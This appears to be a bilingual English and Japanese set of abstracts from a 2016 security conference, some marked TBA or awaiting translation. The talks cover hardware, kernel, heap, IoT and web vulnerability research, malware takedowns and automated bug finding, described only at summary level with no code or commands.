TBA

（後日翻訳）
Based on one decade of impactful security research and several years as a risk manager, Karsten Nohl reflects upon what he would have done differently in pushing a data security agenda.

Our community is convinced that stellar IT security is paramount for companies large and small: We need security for system availability, for brand reputation, to prevent fraud, and to keep data private. But is more security always better?

Poorly chosen protection measures can have large externalities on the productivity, innovation capacity, and even happiness of organizations. Can too much security be worse than too little security?

This talk investigates the trade-off between security and innovation along several examples of current security research. It finds that some hacking research is counter-productive in bringing the most security to most people, by spreading fear too widely.

（後日翻訳）
DVB-T is a standard for digital television broadcasting. The standard requires a consumer who wants to watch the digital television broadcasts to purchase a special device that can receive and process the RF signals.
In my research I wanted to be able to exploit a DVBT receiver via an over the air attack – sending a specially crafted data packet over an RF signal and taking over the device.
The research was focused on a common receiver in Israel and Europe made by a Chinese company called MSTAR. In the talk I will cover the research steps from the firmware extraction from the flash chip to the development of an ad-hoc debugger and finally the exploitation of the device.

TBA

（後日翻訳）
Hard Disk Drives (HDD) have a hidden space for storing data. If malicious software is stored in this hidden area, it could lead to attacking computers even if they are air-gapped.
By abusing surplus space of HDD, such cyber attack against off-line industrial control systems could become possible.
Moreover, the software or any data in this hidden space can survive against formatting, OS reinstallation, malware destruction software and any conventional cybersecurity framework.

Let us call it "PARADAIS"

While the PARADAIS stays unactivated, LBAs are not mapped to the hidden data area. Therefore, even if the HDD is wiped several times such as 3-pass, 7-pass or 35-pass, it remains there as it is.
There has been no way to detect or erase the unidentified software at PARADAIS in advance when the HDD had been modified prior to your purchase or its installation. However, new solutions are being discovered by my ongoing research.
Who can predict that Windows OS may boot after the HDD is wiped by Enhanced Secure Erase ? It would be you at CODEBLUE2016.
The 2nd part of my presentation would be on DATA RECOVERY from HDD the platter surface of which has been damaged because of head crash, natural disaster or intentional destruction at crime scenes. Survey results of 12 cases show how effective the disk surface cleaning by DDRH was.

（後日翻訳）
The very best attackers often use PowerShell to hide their scripts from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not enable this PowerShell logging. Therefore, I will provide techniques that the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will conclude this talk by highlighting the public release of Invoke-Obfuscation. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line argument detection mechanisms.

（後日翻訳）
For quite some time we have been seeing espionage cases reaching countries, governments and large companies.
A large number of backdoors were found on network devices, mobile phones and other related devices, having as main cases the ones that were reported by the media, such as: TP-Link, Dlink, Linksys, Samsung and other companies which are internationally renowned.
This talk will discuss a backdoor found on the modem / router rtn, equipment that has a big question mark on top of it, because there isn’t a vendor identification and no information about who’s its manufacturer and there are at least 7 companies linked to its production, sales and distribution in the market. Moreover, some of them never really existed.

Which lead us to question on the research title: “Who put the backdoor in my modem?”

（後日翻訳）
Smartphones are commonly used as the controller and Internet gateway for BLE-enabled IoT devices. Designing a strong authentication protocol between them is the key part of IoT security. However mobile app design has many challenges such as limited input & output interfaces as well as user privacy protection features. Due to these restrictions, many vendors has given-up BLE's build-in security manager protocol and choose to build their own authentication protocols.
This study focused on a generalized method to analyze these BLE authentication protocols, discovering and solving challenges mentioned above. We applied this method on commercial products, including popular Gogoro Smart Scooter from Taiwan. We will demo under some certain circumstances it is possible to dump key used to unlock your Gogoro Scooter and send fake BLE authentication protocol packets to steal the scooter.

（後日翻訳）
On June, thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO & founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating its legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over victims Facebook and Google Drive accounts. After puzzling the script, they managed to extract the proverbial needle from a haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bites and bytes of the campaign and explaining how the attackers exploited Facebook to spread the malware.

（後日翻訳）
End-user’s requirements for secure IT products are continually increased in environment that are affected directly to human life and industry such as IoT, CPS. Because vendors and end-user sell or buy products based on trustworthy or objective security evaluation results, security evaluation roles are important. Security Evaluations are divided to two parts, one is evaluation on design level such as ISO/IEC 29128(Verification of Cryptographic Protocols) and another one is post-implementation level such as ISO/IEC 15408(Common Criteria). These security evaluation standards, both ISO/IEC 29128 and ISO/IEC 15408, advise to use formal verification and automated tools when high assurance level of target products is required.
For a long time, vulnerability detection using automated tools have been tried and studied by many security researchers and hackers. And recently, the study related to automated vulnerability detection are now more active than ever in hacking community with DARPA’s CGC(Cyber Grand Challenge). But, too many tools are developed continually and usually each tool has their own purpose to use, so it’s hard to achieve ultimate goal of security evaluation effectively and verify evaluation results.
Furthermore, there are no references for categorizing about automated tools on perspective of security evaluations. So, in this presentation we will list up, categorize and analyze all of automated tools for vulnerability detection and introduce our result such as pros and cons, purpose, effectiveness, etc.

（後日翻訳）
Building a distributed scanner can be challenging, building one using real browsers even more so.
Injecting JavaScript to extract JS libraries and their versions, storing all HTML and JavaScript along with security headers requires a unique architecture. Having scanned the top 1,000,000 sites, I will cover the challenges I overcame in designing a scalable system to fingerprint the current state of the web. I will also present some of the more interesting findings of the data that was analyzed.

日本では情報セキュリティに係る人材が不足している。私は人材不足を解消する一つの方法として、人工知能（AI）技術に着目し、自らの意志でWebアプリケーションの脆弱性を見つけ出すAI「SAIVS（Spider Artificial Intelligence Vulnerability Scanner）」の研究開発を進めている。SAIVSの最終目標は、人間の脆弱性診断員と同等以上の診断能力を獲得することである。現在のSAIVSはプロトタイプだが、以下に示す人間のような行動を取りながらWebアプリの脆弱性を見つけ出すことが可能である。

1. Webアプリのクローリング
SAIVSはログインや会員登録ページなどの動的ページを、人間と同じようにクローリングすることができる。例えばログインが必要なWebアプリの場合、先に会員登録ページでアカウントを作成し、その後にログインを行う。また、アカウント作成時は、入力フォームの意味（名前、E-mail、パスワードなど）を解釈し、フォームに最適な文字列を入力する。仮に入力値の不備によりエラーが発生した場合、エラーの意味を解釈し、エラーを回避する別の文字列を入力する。

2. 脆弱性の検出
SAIVSはWebアプリの挙動を観察した上で、少ない手数で効率的に脆弱性を見つけ出すことができる。例えば反射型XSSの場合、入力値がエコーバックされる箇所を認識し、HTMLやJavaScriptの文脈に応じて悪用可能なタグやスクリプトを挿入する。また、入力値がサニタイズされた場合は、これを回避する検査パターンを自ら判断して再度検査を行う。

これらの行動は、複数の機械学習アルゴリズムを使用し、脆弱性診断員が脆弱性を見つけ出す際の思考パターンをシミュレートすることで実現している。

本プレゼンでは、SAIVSを実現する手法の解説と、検証サイトをクローリングしながら脆弱性（反射型XSS）を見つけ出すデモンストレーションを披露する。

（後日翻訳）
The state of VPN protocols is not pretty, with popular options, such as IPsec and OpenVPN, being overwhelmingly complex, with large attack surfaces, using mostly cryptographic designs from the 90s. WireGuard presents a new abuse-resistant and high-performance alternative based on modern cryptography, with a focus on implementation and usability simplicity. It uses a 1-RTT handshake, based on NoiseIK, to provide perfect forward secrecy, identity hiding, and resistance to key-compromise impersonation attacks, among other important security properties, as well as high performance transport using ChaCha20Poly1305. A novel IP-binding cookie MAC mechanism is used to prevent against several forms of common denial-of-service attacks, both against the client and server, improving greatly on those of DTLS and IKEv2. Key distribution is handled out-of-band with extremely short Curve25519 points, which can be passed around in the likes of OpenSSH. Discarding the academic layering perfection of IPsec, WireGuard introduces the idea of a "cryptokey routing table", alongside an extremely simple and fully defined timer-state mechanism, to allow for easy and minimal configuration; WireGuard is actually securely deployable in practical settings. In order to rival the performance of IPsec, WireGuard is implemented inside the Linux kernel, but unlike IPsec, it is implemented in less than 4,000 lines of code, making the implementation manageably auditable. The talk will examine both the cryptography and kernel implementation particulars of WireGuard and explore an offensive attack perspective on network tunnels.

（後日翻訳）
iOS was the first to introduce Kernel Patch Protection (KPP) as a method meant to mitigate tampering with kernel code. Samsung followed suit with TIMA/KRP. Both of these, however, remain undocumented to this day.
With Apple's recent relaxing of the iOS encryption, a rare first glance has been provided into the workings of KPP. At last, it can be compared and contrasted with Samsung's implementation.
This talk will present the theoretical aspects (TrustZone, ARM ELx and secure monitor), and then discuss the two implementations - Apple and Samsung - side by side. Full examples with decompilation (using author's free tools) will be provided.

インターネットバンキングに関わる不正送金の被害は、2013年以降、急激に増加しており、社会問題となっている。
2015年4月に警視庁が日本独自としては初のテイクダウン作戦である「ネットバンキングウイルス無力化作戦」を実施した。
我々は警視庁の要請により、「ネットバンキングウイルス無力化作戦」のターゲットである「VAWTRAK」を無力化する技術を開発し、技術協力を行った。
本発表では、無力化作戦の概要と技術協力に至るまでの経緯について紹介する。
また、我々がVAWTRAKを無力化するために開発した技術についてデモを交えて紹介する。
さらに、2016年に流行する金融マルウェアの調査結果から攻撃が高度化している実態について述べる。

TBA

（後日翻訳）
OSX security vulnerability study is gaining more and more popular recently because Mac devices become more and more popular. OSX IOKit exposes large attacking surface for hackers compromising kernel extension and kernel itself from user mode. Many researcher do research on this domain (see Reference section). We will share some research results about this domain.
1. One passive fuzzing framework with context enlightenment to hunt kernel vulnerability.
2. Exploit tricks for how to occupy kernel memory from user mode program to bypass SMAP&SMEP.
3. Utilizing the vulnerabilities which found by our fuzzing method and the new exploit trick to root OSX successfully 2 times.
We introduce a new method ｡ｰPassive Fuzzing And Context Enlightenment for OSX IOKit｡ｱ which names PFACE.PFACE has following highlight points. Firstly it can meet the condition dependency and permit code execution deeper and wider to hit more codes and get more system crash. And secondly it can output the modules which contains ｡ｰContexts｡ｱ which is indicator for suspicious vulnerability. These indicators will lead reviewer to review these modules firstly.
If you have a bunch of kernel vulnerabilities, the big problem is how to transfer your ROP gadgets to the kernel space from user mode program because recent OSX already enable SMAP and SMEP. The famous security researcher Stefan Esser proposed that OSData be a good structure to occupy kernel memory [Refenece section 5]. Yes, OSData is a good data structure. But in practice, there are some problems causing OSData not to work. We find a new method that let OSData does work for occupy kernel memory from user mode program. We use the method to exploit the vulnerabilities we found and root OSX (10.11.3) successfully.
In practice, we find tens of vulnerabilities with CVE number, and many kernel crashes which fuzzing effect has been approved. And also we construct two different Local Privilege Escalation exploit to root by using some vulnerabilities of them on Mac OSX (10.11.3 ).
Here below is the CVE and ZDI list until now(NOT including submitted but pending):CVE-2015-3787, CVE-2015-5867, CVE-2015-7021,CVE-2015-7020, CVE-2016-1716,ZDI-CAN-3536,ZDI-CAN-3558, ZDI-CAN-3598,ZDI-CAN-3596,ZDI-CAN-3603,CVE-2015-7067, CVE-2015-7076,CVE-2015-7106,CVE-2015-7109,CVE-2016-1718,CVE-2016-1747,CVE-2016-1749,CVE-2016-1753, ZDI-CAN-3693, ZDI-CAN-3694, CVE-2016-1795, CVE-2016-1808, CVE-2016-1810, CVE-2016-1817, CVE-2016-1820, CVE-2016-1798, CVE-2016-1799, CVE-2016-1812, CVE-2016-1814, CVE-2016-1818, CVE-2016-1816

（後日翻訳）
Air-gapped networks are isolated, separated both logically and physically from public networks. For example, military, industrial, and financial networks. Although the feasibility of invading such systems has been demonstrated in recent years, communication of data to/from air-gapped networks is a challenging task to attackers to perpetrate, an even more difficult threat to defend against.
New methods of communicating with air gapped networks are currently being exposed, some advanced and difficult to mitigate. These new found vulnerabilities have wide reaching implications on what we considered to be a foolproof solution to network security –the placement of a physical air gap.
But it doesn’t stop there – new techniques of covertly getting information in and out of air gapped networks are being exposed. Thus it is important not only to publicize these vectors of attack, but their countermeasures and feasibility as well.
In this talk, we will outline the steps an attacker must take in order to bridge an air gapped network. We will review the state-of-the-art techniques over thermal, radio, and acoustic channels, and discuss each one’s countermeasures and feasibility. Most of techniques in this talk were discovered in our labs by researcher Mordichai Guri under the supervision of Prof. Yuval Elovici.

近年、電気自動車を筆頭にリモートから自動車の位置情報(GPS)の取得や制御を提供するサービスが増えている。
こうしたサービスは自動車OEMにとっては自動車に対するより高い付加価値となる可能性のある挑戦的なサービスである。
その一方で、今までインターネットを初めとした不特定多数の機器と相互通信するネットワークとの繋がりを持たなかった自動車にとってこうしたサービスの登場は新たな脅威に晒されることで新しいリスクを生み出すとも言える。
事実、2015年から今までの僅かな期間でこうしたサービスに対する問題点がいくつも報告されている。

こうした問題はいずれも国外で指摘されたものだが、日本市場ではどうだろうか？
そこで、我々は国内外のOEM各社が日本向けに提供しているクライアントアプリを解析、これらのアプリに対するアプリ間連携や通信に利用する証明書検証などの脆弱性の有無に加えて、攻撃者のリバースエンジニアリングによってこうした問題が発見され、悪用されることを防ぐ難読化などの耐解析技術の適用状況について評価を行った。

なお、現状日本国内において問題が指摘されているようなリモートから車両の一部機能を制御可能なサービスを提供しているOEMは限られている。
そのため、本講演では日本向けのアプリだけではなく米国向けのアプリも対象として、現時点におけるアプリのセキュリティ対策状況の評価結果およびその結果に基づいた将来的にエクスプロイトされる可能性と今後必要な対策について解説する。

TBA

（後日翻訳）
Recently our team researched various ntos subsystem attack vectors, and one of the outputs we will present in our talk. DeathNote as our internal code name to this component, which resides in Microsoft Windows kernel, hiding behind different interfaces and exposed to user differently.

What can goes bad with it?

Basically two kinds of problems, one is syscall handling via direct user interaction. We will describe how to obtain basic understanding of what's going on, how it interacts with other components and what is its purpose. With those knowledge we will dig deeper how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in Windows kernel, and demonstrate some of them.
And as for second, as it hints from title, this module does bit of data parsing, so we will dive deep into internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanism. We will show how some tricks can outcome with various results, and how structured approach can expose more problems than is expected.

TBA

TBA

（後日翻訳）
The Cyber Grand Challenge (CGC) was announced in 2013--a first-of-its-kind competition in which fully autonomous systems would compete in a Capture The Flag (CTF) tournament. Starting from over 100 teams consisting of some of the top security researchers and hackers in the world, only 7 teams qualified to the final round. These 7 teams competed against eachother to guard their own software with IDS rules and software patches while attacking the other systems. All of this was done without access to program source code nor access to humans.

This never-before-seen level of autonomy demonstrated the state of the art in areas of computer security including static analysis, automated bug finding, automatic exploit generation, and automatic software patching. Over the course of just 10 hours, these systems competed to analyze over 80 totally new pieces of software, showing capabilities beyond what anyone has ever seen before.

In this talk we will discuss the Cyber Grand Challenge, explaining what it entailed, what the results mean, and how these advances will influence software security in the near future. Additionally, we will share lessons learned from the winning CGC team, and take a look at the future of automatic software analysis.

Electronは、WindowsやOS X、Linuxのデスクトップアプリケーションを簡単に作成するためのフレームワークであり、Atom EditorやVisual Studio Code、Slackといった人気アプリケーションの開発にも用いられている。ElectronはChromiumとnode.jsを内包することでWebアプリケーション開発者が慣れた手法でデスクトップアプリケーションを開発可能にしている反面、アプリケーション内にDOM-based XSSが一か所でも存在すると容易に任意コード実行が可能になるなどセキュリティ上の問題点も多数存在しており、事実、今日までに著名なElectron製アプリケーションにおいて任意コード実行が可能な脆弱性を多数発見・報告している。
本セッションでは、Electronを利用して開発する際に発生しやすいセキュリティ上の問題点を整理して理解することを目的にしている。

例えば関数ポインタのようにBuffer Overflowに対して影響を受けやすい何らかデータが動的確保された領域にあるならば, Heap-based Buffer OverflowはStack-based Buffer Overflowと同じくらい攻撃されやすいと考えられる. しかし, メモリレイアウトはアプリケーションごとに異なるため, リモートからの攻撃者にはそれが本当に攻撃可能かどうかが判らない. そのためHeap-based Buffer Overflowへの攻撃はそれほど実践的でないとも言えるが, 大変興味深いものなので焦点を当ててみよう.
任意のコード実行のためにプログラムカウンタを得るというものは攻撃者の目的のひとつであり, 攻撃者はそれを"write-what-where primitive"(任意の箇所への任意のデータを書き込み)により実現することがある. Unlink Attackという直接的な"write-what-where primitive"を実現する古典的な攻撃手法があったが, 現在では緩和策が施されたことで使えなくなっている. そのため, Exploit書きはmalloc()の戻り値をほぼ任意のアドレスに固定させることで間接的な"write-what-where primitive"を実現する手法を考えた. 間接的な"write-what-where primitive"を有するHeap ExploitationテクニックにはMalloc Maleficarum(Phantasmal Phantasmagoria氏による攻撃手法とその論文)などがある. そのうちのいくつかは既に修正されているが, 未だに有効なものもある.
今回は最新のGLIBCでも有効であり, 間接的"write-what-where primitive"を有する新たな攻撃手法として"House of Einherjar"を提案したいと思う.

（後日翻訳）
This talk will explore program analysis on compiled code, where source is not available. Many static program analysis tools, such as LLVM passes, depend on the ability to compile source to bytecode, and cannot operate on binaries. A solution to this problem will be explained and demonstrated using the new Intermediate Language (IL) in Binary Ninja. Binary Ninja IL will be described, providing a basic understanding of how to write analyses using it.

This talk will describe and release a tool in Binary Ninja IL for automated discovery of a simple memory corruption vulnerability and demonstrate it on a CTF binary. The concepts of variable analysis, abstract interpretation, and integer range analysis will be discussed in the context of vulnerability discovery.